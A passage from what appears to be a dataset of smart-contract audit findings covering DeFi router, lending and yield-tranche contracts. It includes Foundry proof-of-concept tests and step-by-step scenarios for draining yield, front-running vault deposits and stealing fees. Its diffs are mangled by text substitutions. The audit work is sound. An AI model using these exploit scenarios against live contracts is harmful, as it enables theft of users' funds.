this causes wrapped tokens to get stuck in the contract.\\nIn the protocol the `JalaMasterRouter` is used to swap tokens with less than 18 decimals. It is achieved by wrapping the underlying tokens and interacting with the `JalaRouter02`. Wrapping the token gives it decimals 18 (18 - token.decimals()). There are also functions that swap with native ETH.\\nIn the `swapExactTokensForETH` function the tokens are transferred from the user to the Jala master router, wrapped, approved to `JalaRouter2` and then `IJalaRouter02::swapExactTokensForETH()` is called with the amount of tokens to swap, to address, deadline and path.\\nThe amount of tokens to swap that is passed, is the amount before the wrap. Hence the wrappedAmount - underlyingAmount is stuck.\\nAdd the following test to `JalaMasterRouter.t.sol` and run with `forge test --mt testswapExactTokensForETHStuckTokens -vvv`\\n```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(\"ETH user balance before: \", user0.balance);\\n console.log(\"TokenA user balance before: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance before: \", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(\"ETH user balance after: \", user0.balance);\\n console.log(\"TokenA user balance after: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance after: \", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\nчIn `JalaMasterRouter::swapExactTokensForETH()` multiply the `amountIn` by decimal off set of the token:\\n```\\n function swapExactTokensForETH(\\n address originTokenAddress,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address[] calldata path,\\n address to,\\n uint256 deadline\\n ) external virtual override returns (uint256[] memory amounts) {\\n address wrappedTokenIn = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(originTokenAddress);\\n\\n require(path[0] == wrappedTokenIn, \"MS: !path\");\\n\\n TransferHelper.safeTransferFrom(originTokenAddress, msg.sender, address(this), amountIn);\\n _approveAndWrap(originTokenAddress, amountIn);\\n IERC20(wrappedTokenIn).approve(router, IERC20(wrappedTokenIn).balanceOf(address(this)));\\n\\n// Add the line below\\n uint256 decimalOffset = IChilizWrappedERC20(wrappedTokenIn).getDecimalsOffset();\\n// Add the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn * decimalOffset, amountOutMin, path, to, deadline);\\n// Remove the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn , amountOutMin, path, to, deadline);\\n }\\n```\\nчUser wrapped tokens get stuck in router contract. The can be stolen by someone performing a `swapExactTokensForTokens()` because it uses the whole balance of the contract when swapping: `IERC20(wrappedTokenIn).balanceOf(address(this))`\\n```\\n amounts = IJalaRouter02(router).swapExactTokensForTokens(\\n IERC20(wrappedTokenIn).balanceOf(address(this)),\\n amountOutMin,\\n path,\\n address(this),\\n deadline\\n );\\n```\\nч```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(\"ETH user balance before: \", user0.balance);\\n console.log(\"TokenA user balance before: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance before: \", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(\"ETH user balance after: \", user0.balance);\\n console.log(\"TokenA user balance after: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance after: \", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\n -JalaPair potential permanent DoS due to overflowчmediumчIn the `JalaPair::_update` function, overflow is intentionally desired in the calculations for `timeElapsed` and `priceCumulative`. This is forked from the UniswapV2 source code, and it's meant and known to overflow. UniswapV2 was developed using Solidity 0.6.6, where arithmetic operations overflow and underflow by default. However, Jala utilizes Solidity >=0.8.0, where such operations will automatically revert.\\n```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\nчUse the `unchecked` block to ensure everything overflows as expectedчThis issue could potentially lead to permanent denial of service for a pool. All the core functionalities such as `mint`, `burn`, or `swap` would be broken. Consequently, all funds would be locked within the contract.\\nI think issue with High impact and a Low probability (merely due to the extended timeframe for the event's occurrence, it's important to note that this event will occur with 100% probability if the protocol exists at that time), should be considered at least as Medium.\\nReferences\\nThere are cases where the same issue is considered High.ч```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\n -Fees aren't distributed properly for positions with multiple lenders, causing loss of funds for lendersчhighчFees distributed are calculated according to a lender's amount lent divided by the total amount lent, which causes more recent lenders to steal fees from older lenders.\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThe above is from harvest(); `repay()` calculates the fees similarly. Because `borrow()` doesn't distribute fees, the following scenario will occur when a borrower increases an existing position:\\nBorrower has an existing position with fees not yet collected by the lenders.\\nBorrower increases the position with a loan from a new lender.\\n`harvest()` or `repay()` is called, and the new lender is credited with some of the previous fees earned by the other lenders due to the fees calculation. Other lenders lose fees.\\nThis scenario can naturally occur during the normal functioning of the protocol, or a borrower/attacker with a position with a large amount of uncollected fees can maliciously open a proportionally large loan with an attacker to steal most of the fees.\\nAlso note that ANY UDPATE ISSUE? LOW PRIOчA potential fix is to harvest fees in the borrow() function; the scenario above will no longer be possible.чLoss of funds for lenders, potential for borrowers to steal fees.ч```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n -Entrance fees are distributed wrongly in loans with multiple lendersчmediumчEntrance fees are distributed improperly, some lenders are likely to lose some portion of their entrance fees. Also, calling `updateHoldTokenEntranceFee()` can cause improper entrance fee distribution in loans with multiple lenders.\\nNote that entrance fees are added to the borrower's `feesOwed` when borrowing:\\n```\\n borrowing.feesOwed += entranceFee;\\n```\\n\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThis is a problem because the entrance fees will be distributed among all lenders instead of credited to each lender. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 tokens.\\nAfter some time, the lender harvests fees and fees are set to zero. (This step could be frontrunning the below step.)\\nThe borrower immediately takes out another loan of 100 tokens and pays and entrance fee of 10 tokens.\\nWhen fees are harvested again, due to the calculation in the code block above, 5 tokens of the entrance fee go to the first lender and 5 tokens go to the second lender. The first lender has collected 15 tokens of entrance fees, while the second lender has collected only 5- despite both loans having the same borrowed amount.\\nFurthermore, if the entrance fee is increased then new lenders will lose part of their entrance fee. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 tokens.\\nThe entrance fee is increased.\\nThe borrower increases the position by taking a loan of 100 tokens from a new lender, and pays an entrance fee of 20 tokens.\\n`harvest()` is called, and both lenders receive 15 tokens out of the total 30 tokens paid as entrance fees. This is wrong since the first lender should receive 10 and the second lender should receive 20.чCould add the entrance fee directly to the lender's fees balance instead of adding it to feesOwed, and then track the entrance fee in the loan data to be used in min fee enforcement calculations.чLenders are likely to lose entrance fees.ч```\\n borrowing.feesOwed += entranceFee;\\n```\\n -A borrower eligible for liquidation can pay an improperly large amount of fees, and may be unfairly liquidatedчmediumчIf a borrower is partially liquidated and then increases the collateral balance to avoid further liquidation, they will pay an improperly large amount of fees and can be unfairly liquidated.\\n```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n\\nWhen liquidation occurs right after becoming liquidatable, the `collateralBalance` calculation in `repay()` above will be a small value like -1; and essentially all the fees owed will be collected.\\nIf the borrower notices the partial liquidation and wishes to avoid further liquidation, `increaseCollateralBalance()` can be called to become solvent again. But since the `accLoanRatePerSeconds` wasn't updated, the borrower will have to doubly pay all the fees that were just collected. This will happen if a lender calls `harvest()` or the loan is liquidated again. The loan can also be liquidated unfairly, because the `collateralBalance` calculated above will be much lower than it should be.чUpdate `accLoanRatePerSeconds` for incomplete emergency liquidations.чThe borrower may pay too many fees, and it's also possible to unfairly liquidate the position.ч```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n -All yield could be drained if users set any ````> 0```` allowance to othersчhighч`Tranche.redeemWithYT()` is not well implemented, all yield could be drained if users set any `> 0` allowance to others.\\nThe issue arises on L283, all `accruedInTarget` is sent out, this will not work while users have allowances to others. Let's say, alice has `1000 YT` (yield token) which has generated `100 TT` (target token), and if she approves bob `100 YT` allowance, then bob should only be allowed to take the proportional target token, which is `100 TT` * (100 YT / 1000 YT) = 10 TT.\\n```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n\\nThe following coded PoC shows all unclaimed and unaccrued target token could be drained out, even if the allowance is as low as `1wei`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {TestTranche} from \"./Tranche.t.sol\";\\nimport \"forge-std/console2.sol\";\\n\\ncontract TrancheAllowanceIssue is TestTranche {\\n address bob = address(0x22);\\n function setUp() public virtual override {\\n super.setUp();\\n }\\n\\n function testTrancheAllowanceIssue() public {\\n // 1. issue some PT and YT\\n deal(address(underlying), address(this), 1_000e6, true);\\n tranche.issue(address(this), 1_000e6);\\n\\n // 2. generating some unclaimed yield\\n vm.warp(block.timestamp + 30 days);\\n _simulateScaleIncrease();\\n\\n // 3. give bob any negligible allowance, could be as low as only 1wei\\n tranche.approve(bob, 1);\\n yt.approve(bob, 1);\\n\\n // 4. all unclaimed and pending yield drained by bob\\n assertEq(0, underlying.balanceOf(bob));\\n vm.prank(bob);\\n tranche.redeemWithYT(address(this), bob, 1);\\n assertTrue(underlying.balanceOf(bob) > 494e6);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-01-napier\\napier-v1> forge test --match-test testTrancheAllowanceIssue -vv\\n[⠔] Compiling// rest of code\\n[⠊] Compiling 42 files with 0.8.19\\n[⠔] Solc 0.8.19 finished in 82.11sCompiler run successful!\\n[⠒] Solc 0.8.19 finished in 82.11s\\n\\nRunning 1 test for test/unit/TrancheAllowanceIssue.t.sol:TrancheAllowanceIssue\\n[PASS] testTrancheAllowanceIssue() (gas: 497585)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\nч```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/napier// Remove the line below\\nv1/src/Tranche.sol b/napier// Remove the line below\\nv1/src/Tranche.sol\\nindex 62d9562..65db5c6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/napier// Remove the line below\\nv1/src/Tranche.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/napier// Remove the line below\\nv1/src/Tranche.sol\\n@@ // Remove the line below\\n275,12 // Add the line below\\n275,15 @@ contract Tranche is BaseToken, ReentrancyGuard, Pausable, ITranche {\\n delete unclaimedYields[from];\\n gscales = _gscales;\\n\\n// Add the line below\\n uint256 accruedProportional = accruedInTarget * pyAmount / _yt.balanceOf(from);\\n// Add the line below\\n unclaimedYields[from] = accruedInTarget // Remove the line below\\n accruedProportional;\\n// Add the line below\\n \\n // Burn PT and YT tokens from `from`\\n _burnFrom(from, pyAmount);\\n _yt.burnFrom(from, msg.sender, pyAmount);\\n\\n // Withdraw underlying tokens from the adapter and transfer them to the user\\n// Remove the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // Add the line below\\n accruedInTarget);\\n// Add the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // Add the line below\\n accruedProportional);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n\\n emit RedeemWithYT(from, to, amountWithdrawn);\\n```\\nчUsers lost all unclaimed and unaccrued yieldч```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n -LP Tokens always valued at 3 PTsчhighчLP Tokens are always valued at 3 PTs. As a result, users of the AMM pool might receive fewer assets/PTs than expected. The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.\\nThe Napier AMM pool facilitates trade between underlying assets and PTs. The PTs in the pool are represented by the Curve's Base LP Token of the Curve's pool that holds the PTs. The Napier AMM pool and Router math assumes that the Base LP Token is equivalent to 3 times the amount of PTs, as shown below. When the pool is initially deployed, it is correct that the LP token is equivalent to 3 times the amount of PT.\\n```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n\\n```\\nFile: NapierPool.sol\\n /// @dev Number of coins in the BasePool\\n uint256 internal constant N_COINS = 3;\\n..SNIP..\\n totalBaseLptTimesN: baseLptUsed * N_COINS,\\n..SNIP..\\n totalBaseLptTimesN: totalBaseLpt * N_COINS,\\n```\\n\\nIn Curve, LP tokens are generally priced by computing the underlying tokens per share, hence dividing the total underlying token amounts by the total supply of the LP token. Given that the underlying assets in Curve's stable swap are pegged to each other, the invariant's $D$ value can be computed to estimate the total value of the underlying tokens.\\nCurve itself provides a function `get_virtual_price` that computes the price of the LP token by dividing $D$ with the total supply.\\nNote that for LP tokens, the ratio of the total underlying value and the total supply will grow (fee mechanism) over time. Thus, the virtual price's value will increase over time.\\nThis means the LP token will be worth more than 3 PTs in the Curve Pool over time. However, the Naiper AMM pool still values its LP token at a constant value of 3 PTs. This discrepancy between the value of the LP tokens in the Napier AMM pool and Curve pool might result in various issues, such as the following:\\nInvestors brought LP tokens at the price of 3.X PT from the market. The LP tokens are deposited into or swap into the Napier AMM pool. The Naiper Pool will always assume that the price of the LP token is 3 PTs, thus shortchanging the number of assets or PTs returned to users.\\nPotential arbitrage opportunity where malicious users obtain the LP token from the Naiper AMM pool at a value of 3 PT and redeem the LP token at a value higher than 3 PTs, pocketing the differences.чNaiper and Pendle share the same core math for their AMM pool.\\nIn Pendle, the AMM stores the PTs and SY (Standard Yield Token). When performing any operation (e.g., deposit, swap), the SY will be converted to the underlying assets based on SY's current rate before performing any math operation. If it is a SY (wstETH), the SY's rate will be the current exchange rate for wstETH to stETH/ETH. One could also think the AMM's reserve is PTs and Underlying Assets under the hood.\\nIn Napier, the AMM stores the PTs and Curve's LP tokens. When performing any operation, the math will always convert the LP token to underlying assets using a static exchange rate of 3. However, this is incorrect, as the value of an LP token will grow over time. The AMM should value the LP tokens based on their current value. The virtual price of the LP token and other information can be leveraged to derive the current value of the LP tokens to facilitate the math operation within the pool.чUsers of the AMM pool might receive fewer assets/PTs than expected. The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.ч```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n -Victim's fund can be stolen due to rounding error and exchange rate manipulationчhighчVictim's funds can be stolen by malicious users by exploiting the rounding error and through exchange rate manipulation.\\nThe LST Adaptor attempts to guard against the well-known vault inflation attack by reverting the TX when the amount of shares minted is rounded down to zero in Line 78 below.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n\\nHowever, this control alone is not sufficient to guard against vault inflation attacks.\\nLet's assume the following scenario (ignoring fee for simplicity's sake):\\nThe victim initiates a transaction that deposits 10 ETH as the underlying asset when there are no issued estETH shares.\\nThe attacker observes the victim's transaction and deposits 1 wei of ETH (issuing 1 wei of estETH share) before the victim's transaction. 1 wei of estETH share worth of PT and TY will be minted to the attacker.\\nThen, the attacker executes a transaction to directly transfer 5 stETH to the adaptor. The exchange rate at this point is `1 wei / (5 ETH + 1 wei)`. Note that the `totalAssets` function uses the `balanceOf` function to compute the total underlying assets owned by the adaptor. Thus, this direct transfer will increase the total assets amount.\\nWhen the victim's transaction is executed, the number of estETH shares issued is calculated as 10 ETH * `1 wei / (5 ETH + 1 wei)`, resulting in 1 wei being issued due to round-down.\\nThe attacker will combine the PT + YT obtained earlier to redeem 1 wei of estETH share from the adaptor.\\nThe attacker, holding 50% of the issued estETH shares (indirectly via the PT+YT he owned), receives `(15 ETH + 1 wei) / 2` as the underlying asset.\\nThe attacker seizes 25% of the underlying asset (2.5 ETH) deposited by the victim.\\nThis scenario demonstrates that even when a revert is triggered due to the number of issued estETH share being 0, it does not prevent the attacker from capturing the user's funds through exchange rate manipulation.чFollowing are some of the measures that could help to prevent such an attack:\\nMint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2)\\nAvoid using the `balanceOf` so that malicious users cannot transfer directly to the contract to increase the assets per share. Track the total assets internally via a variable.чLoss of assets for the victim.ч```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n -Anyone can convert someone's unclaimed yield to PT + YTчmediumчAnyone can convert someone's unclaimed yield to PT + YT, leading to a loss of assets for the victim.\\nAssume that Alice has accumulated 100 Target Tokens in her account's unclaimed yields. She is only interested in holding the Target token (e.g., she is might be long Target token). She intends to collect those Target Tokens sometime later.\\nBob could disrupt Alice's plan by calling `issue` function with the parameter (to=Alice, underlyingAmount=0). The function will convert all 100 Target Tokens stored within Alice's account's unclaimed yield to PT + YT and send them to her, which Alice does not want or need in the first place.\\nLine 196 below will clear Alice's entire unclaimed yield before computing the accrued interest at Line 203. The accrued interest will be used to mint the PT and YT (Refer to Line 217 and Line 224 below).\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n\\nThe market value of the PT + YT might be lower than the market value of the Target Token. In this case, Alice will lose due to Bob's malicious action.\\nAnother `issue` is that when Bob calls `issue` function on behalf of Alice's account, the unclaimed target tokens will be subjected to the issuance fee (See Line 218 above). Thus, even if the market value of PT + YT is exactly the same as that of the Target Token, Alice is still guaranteed to suffer a loss from Bob's malicious action.\\nIf Alice had collected the unclaimed yield via the collect function, she would have received the total value of the yield in the underlying asset terms, as a collection of yield is not subjected to any fee.чConsider not allowing anyone to issue PY+YT on behalf of someone's account.чLoss of assets for the victim.ч```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n -`withdraw` function does not comply with ERC5095чmediumчThe `withdraw` function of Tranche/PT does not comply with ERC5095 as it does not return the exact amount of underlying assets requested by the users.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of? EIP20 and IERC5095\\nFollowing is the specification of the `withdraw` function of ERC5095. It stated that the user must receive exactly `underlyingAmount` of underlying tokens.\\nwithdraw Burns principalAmount from holder and sends exactly underlyingAmount of underlying tokens to receiver.\\nHowever, the `withdraw` function does not comply with this requirement.\\nOn a high-level, the reason is that Line 337 will compute the number of shares that need to be redeemed to receive `underlyingAmount` number of underlying tokens from the adaptor. The main problem here is that the division done here is rounded down. Thus, the `sharesRedeem` will be lower than expected. Consequently, when `sharesRedeem` number of shares are redeemed at Line 346 below, the users will not receive an exact number of `underlyingAmount` of underlying tokens.\\n```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\nчUpdate the `withdraw` function to send exactly `underlyingAmount` number of underlying tokens to the caller so that the Tranche will be aligned with the ERC5095 specification.чThe tranche/PT does not align with the ERC5095 specification.ч```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\n -Permissioned rebalancing functions leading to loss of assetsчmediumчPermissioned rebalancing functions that could only be accessed by admin could lead to a loss of assets.\\nPer the contest's README page, it stated that the admin/owner is \"RESTRICTED\". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe following describes a way where the admin can block users from withdrawing their assets from the protocol\\nThe admin calls the `setRebalancer` function to set the rebalance to a wallet address owned by them.\\n```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n\\nThe admin calls the `setTargetBufferPercentage` the set the `targetBufferPercentage` to the smallest possible value of 1%. This will cause only 1% of the total ETH deposited by all the users to reside on the adaptor contract. This will cause the ETH buffer to deplete quickly and cause all the redemption and withdrawal to revert.\\n```\\nFile: BaseLSTAdapter.sol\\n function setTargetBufferPercentage(uint256 